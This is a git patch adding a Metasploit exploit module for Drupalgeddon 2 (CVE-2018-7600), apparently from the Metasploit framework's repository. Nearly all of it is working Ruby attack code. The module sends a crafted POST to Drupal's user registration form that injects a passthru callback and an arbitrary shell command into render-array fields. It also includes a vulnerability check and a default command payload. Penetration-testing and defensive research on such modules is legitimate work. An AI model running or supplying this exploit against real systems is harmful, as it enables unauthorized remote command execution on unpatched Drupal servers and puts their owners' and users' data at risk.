From 6838a4e8c47c1450f60f1083752e648c9da2cc93 Mon Sep 17 00:00:00 2001
From: William Vu <William_Vu@rapid7.com>
Date: Fri, 13 Apr 2018 18:15:28 -0500
Subject: [PATCH] Add Drupal Drupalgeddon 2

---
 .../unix/webapp/drupal_drupalgeddon2.rb       | 103 ++++++++++++++++++
 1 file changed, 103 insertions(+)
 create mode 100644 modules/exploits/unix/webapp/drupal_drupalgeddon2.rb

diff --git a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
new file mode 100644
index 0000000000000..7d305ec3309ba
--- /dev/null
+++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
@@ -0,0 +1,103 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Drupal Drupalgeddon 2',
+      'Description'    => %q{
+        This module exploits a vulnerability.
+      },
+      'Author'         => [
+        'Jasper Mattsson', # Vulnerability discovery
+        'a2u',             # Proof of concept
+        'Nixawk',          # Proof of concept
+        'wvu'              # Metasploit module
+      ],
+      'References'     => [
+        ['CVE', '2018-7600'],
+        ['URL', 'https://www.drupal.org/sa-core-2018-002'],
+        ['URL', 'https://greysec.net/showthread.php?tid=2912'],
+        ['URL', 'https://research.checkpoint.com/uncovering-drupalgeddon-2/'],
+        ['URL', 'https://github.com/a2u/CVE-2018-7600'],
+        ['URL', 'https://github.com/nixawk/labs/issues/19']
+      ],
+      'DisclosureDate' => 'Mar 28 2018',
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Privileged'     => false,
+      'Targets'        => [
+        ['Drupal < 7.58, < 8.3.9, < 8.4.6, < 8.5.1', {}]
+      ],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {
+        'PAYLOAD'      => 'cmd/unix/generic',
+        'CMD'          => 'id; uname -a'
+      }
+    ))
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Path to Drupal install', '/']),
+      OptBool.new('CLEAN_URLS',  [false, 'If clean URLs are enabled', true]),
+      OptBool.new('DUMP_OUTPUT', [false, 'If output should be dumped', true])
+    ])
+  end
+
+  def check
+    token = Rex::Text.rand_text_alphanumeric(8..42)
+
+    res = exploit(code: "echo #{token}")
+
+    if res && res.body.include?(token)
+      return CheckCode::Vulnerable
+    end
+
+    CheckCode::Safe
+  end
+
+  # TODO: passthru() may be disabled, so try others
+  def exploit(func: 'passthru', code: payload.encoded)
+    if datastore['CLEAN_URLS']
+      register = '/user/register'
+    else
+      register = '?q=user/register'
+    end
+
+    print_status("Executing on target: #{code}")
+
+    res = send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, register),
+      'vars_get'  => {
+        'element_parents'      => 'account/mail/#value',
+        'ajax_form'            => 1,
+        '_wrapper_format'      => 'drupal_ajax'
+      },
+      'vars_post' => {
+        'form_id'              => 'user_register_form',
+        '_drupal_ajax'         => 1,
+        'mail[#type]'          => 'markup',
+        'mail[#post_render][]' => func,
+        'mail[#markup]'        => code
+      }
+    )
+
+    if res.nil? || res.code != 200
+      print_error("Unexpected reply: #{res.inspect}")
+      return nil
+    end
+
+    print_line(res.body) if datastore['DUMP_OUTPUT']
+
+    res
+  end
+
+end